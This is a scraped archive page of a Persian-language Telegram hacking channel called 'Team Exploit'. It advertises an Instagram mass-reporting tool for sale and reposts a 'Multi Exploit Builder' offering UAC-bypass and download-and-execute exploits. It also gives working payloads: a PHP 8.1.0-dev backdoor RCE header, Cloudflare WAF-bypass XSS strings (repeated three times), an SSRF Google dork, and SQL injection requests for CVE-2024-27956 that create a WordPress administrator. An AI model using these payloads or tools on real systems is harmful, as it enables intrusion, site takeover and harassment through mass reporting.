Team Exploit
Kanalga Telegram’da o‘tish
2 285
Obunachilar
Ma'lumot yo'q24 soatlar
-47 kunlar
-930 kunlar
Postlar arxiv
2 285
کانال 2021 میخرید؟
چندتا دارم قیمت بدید ببینم اگه ارزش داره بفروشم
پست و ممبر نداره
ایدی بیو
2 285
و بالاخره ریپورتر اینستاگرام ساخته شد
با این ریپورتر میتونید از طریق لاگین با اکانتتون ریپورت بدید یا از طریق ایمیل های رندوم
گذینه اخر هم مستقیم به پشتیبانی ایمیل میزنه که بزودی به صورت رایگان برای خریداران رایگان داده میشه
برای خرید به ایدی داخل بیوگرافی برید!
2 285
رایتاپ مربوط به "Xss Reflected را چگونه پیدا کردم که منجر به تصاحب حساب در یک وب سایت تجارت الکترونیک می شود" ترجمه شده
[View]
2 285
انصافا یکم ادم باشید
ابزاری که رایگان براتون میزارم رو نرید کامپایل کنید بفروشید به بقیه
من حالا نمیام اسکرین بزارم بگم فلانی و فلانی این کارو کردن، ابروی کسی هم تو این کانال نبردم
از اعتماد ممبر هاتون به خودتون خجالت بکشید:/
2 285
Repost from esfelurm
Multi Exploit Builder V1
Feature List :
UAC Exploit
Download and Execute Exploit
Windows Shortcut EXploit
UAC Exploit
Using Vbs script
Using Reg
UAC Enable
Using Reg File
Download and Execute Exploit
Reg
Hta
VBS
wfs
ps1
url
cmd
bat
Windows Shortcut EXploit
wav
ps1
png
ini
txt
log
mid
jpg
psc1
dll
gif
ico
dat
xml
hta
cmd
jnt
mp3
cpl
html
ppt
vbs
iso
hlp
rar
ocx
zip
pptx
wfs
js
doc
xls
msi
pdf
url
𝙲𝙷𝙰𝙽𝙽𝙴𝙻 : [@KnightGuardian59]
2 285
گوگل دورک - SSRF
inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
2 285
اگر PHP 8.1.0-dev را پیدا کردید، RCE و SQLi را امتحان کنید
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
اینه که بده!
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit2 285
پیلودهای زیر ممکنه برای XSS WAF Bypass مخصوصا cloudflare جواب بدهند که توی رایتاب های اخیر دیدم:
<select><style></select>
<svg onload=alert(1)>
</style>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit2 285
پیلودهای زیر ممکنه برای XSS WAF Bypass مخصوصا cloudflare جواب بدهند که توی رایتاب های اخیر دیدم:
<select><style></select>
<svg onload=alert(1)>
</style>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit2 285
پیلودهای زیر ممکنه برای XSS WAF Bypass مخصوصا cloudflare جواب بدهند که توی رایتاب های اخیر دیدم:
<select><style></select>
<svg onload=alert(1)>
</style>
```
"><img src=x onerrora=confirm() onerror=confirm(1)>
```
```
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
`
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit2 285
با این کوئری ها میتونین آخرین توییتهای مربوط به پلتفرم مدنظر خودتون رو در باگ بانتی ببینین
روشهای خوبی ارائه میدن
(from:hacker0x01 OR from:bugcrowd OR from:intigriti OR from:yeswehack OR from:synack OR from:hackenproof OR from:zerocopter OR from:immunefi) -filter:replies
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
2 285
+2
امروز چند دقیقه وقت گذاشتم تا #آسیب پذیری #امنیتی #افزونه وردپرس خودکار CVE-2024-27956 (اجرای SQL خودسرانه تایید نشده) را تجزیه و تحلیل کنم. معلوم شد که بهره برداری از آن بسیار آسان است. در اینجا یک PoC اساسی وجود دارد: از آنجایی که "q" مستقیماً به فراخوانی $wpdb->get_results() ارسال می شود، می توانید دستورات SQL را مستقیماً اجرا کنید. افزودن یک کاربر جدید وردپرس:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW ()، 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
تصویر اول
دادن حقوق مدیریت کاربر:
q=INSERT INTO wp_usermeta (user_id، meta_key، meta_value) VALUES (6، 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')، (6 , 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c
تصویر دوم
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit2 285
Bricks <= 1.9.6 در برابر اجرای کد از راه دور تایید نشده (RCE) آسیب پذیر است، به این معنی که هر کسی می تواند دستورات دلخواه را اجرا کند و سایت/سرور را تحت کنترل خود درآورد.
توضیحات کامل: https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
